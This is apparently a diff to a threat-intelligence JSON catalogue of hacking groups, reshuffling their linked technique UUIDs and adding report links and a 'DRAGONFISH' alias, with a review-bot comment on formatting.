 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -772,7 +590,77 @@
 "type": "uses"
 },
 {
- "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4",
+ "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "26c87906-d750-42c5-946c-d4162c73fc7b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b77cf5f3-6060-475d-bd60-40ccbf28fdc2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -785,6 +673,125 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "5a63f900-5e7e-4928-a746-dd4558e1df71",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "cde2d700-9ed1-46cf-9bce-07364fe8b24f",
 "tags": [
@@ -803,10 +810,12 @@
 "refs": [
 "https://attack.mitre.org/groups/G0030",
 "https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html",
+ "https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf",
 "https://securelist.com/the-spring-dragon-apt/70726/"
 ],
 "synonyms": [
 "Lotus Blossom",
+ "DRAGONFISH",
 "Spring Dragon"
 ]
 },
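Review bot: The synonym added as `"DRAGONFISH"` in the `@@ -803` hunk is written in upper case while its siblings `"Lotus Blossom"` and `"Spring Dragon"` are title case; unless the all-caps form is deliberate, `"Dragonfish"` would keep the list consistent and avoids a miss for any consumer that matches synonyms case-sensitively. The Accenture reference added in the same hunk carries a generated path segment (`t20180127T003755Z_w_`), a URL shape that tends not to stay resolvable, so pairing it with an archived copy would protect the citation. Both the `refs` and `synonyms` lists are shown mid-entry here; the enclosing entry starts and ends outside the hunk.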
@@ -868,49 +877,7 @@
 "type": "uses"
 },
 {
- "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "b07c2c47-fefb-4d7c-a69e-6a3296171f54",
+ "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -923,34 +890,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
 "tags": [
@@ -959,49 +898,7 @@
 "type": "uses"
 },
 {
- "dest-uuid": "242f3da3-4425-4d11-8f5c-b842886da966",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665",
+ "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -1015,35 +912,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "0c8465c0-d0b4-4670-992e-4eee8d7ff952",
+ "dest-uuid": "242f3da3-4425-4d11-8f5c-b842886da966",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -1057,35 +933,35 @@
 "type": "uses"
 },
 {
- "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
+ "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23",
+ "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "519630c5-f03f-4882-825c-3af924935817",
+ "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -1098,6 +974,62 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b07c2c47-fefb-4d7c-a69e-6a3296171f54",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077",
 "tags": [
@@ -1106,7 +1038,56 @@
 "type": "uses"
 },
 {
- "dest-uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c",
+ "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "519630c5-f03f-4882-825c-3af924935817",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "0c8465c0-d0b4-4670-992e-4eee8d7ff952",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -1120,7 +1101,35 @@
 "type": "uses"
 },
 {
- "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60",
+ "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -1150,41 +1159,6 @@
 ]
 },
 "related": [
- {
- "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "a5528622-3a8a-4633-86ce-8cdaf8423858",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44",
 "tags": [
@@ -1192,13 +1166,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
 "tags": [
@@ -1207,14 +1174,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "835a79f1-842d-472d-b8f4-d54b545c341b",
+ "dest-uuid": "a5528622-3a8a-4633-86ce-8cdaf8423858",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "835a79f1-842d-472d-b8f4-d54b545c341b",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -1227,6 +1194,27 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "d21a2069-23d5-4043-ad6d-64f6b644cb1a",
 "tags": [
@@ -1234,6 +1222,20 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "a5e91d50-24fa-44ec-9894-39a88f658cea",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
 "tags": [
@@ -1241,6 +1243,13 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
 "tags": [
@@ -1249,7 +1258,7 @@
 "type": "uses"
 },
 {
- "dest-uuid": "a5e91d50-24fa-44ec-9894-39a88f658cea",
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -1272,8 +1281,9 @@
 "https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target",
 "https://www.riskiq.com/blog/labs/cobalt-strike/",
 "https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/",
+ "https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain",
 "https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report",
- "https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain"
+ "https://blog.morphisec.com/cobalt-gang-2.0"
 ],
 "synonyms": [
 "Cobalt Group",
@@ -1283,42 +1293,7 @@
 },
 "related": [
 {
- "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60",
+ "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -1331,69 +1306,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a",
 "tags": [
@@ -1402,28 +1314,7 @@
 "type": "uses"
 },
 {
- "dest-uuid": "d8d19e33-94fd-4aa3-b94a-08ee801a2153",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0",
+ "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -1437,7 +1328,28 @@
 "type": "uses"
 },
 {
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
+ "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -1450,27 +1362,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
 "tags": [
@@ -1485,12 +1376,159 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d8d19e33-94fd-4aa3-b94a-08ee801a2153",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
"type": "uses"
+ },
+ {
+ "dest-uuid": "03259939-0b57-482f-8eb5-87c0e0d54334",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
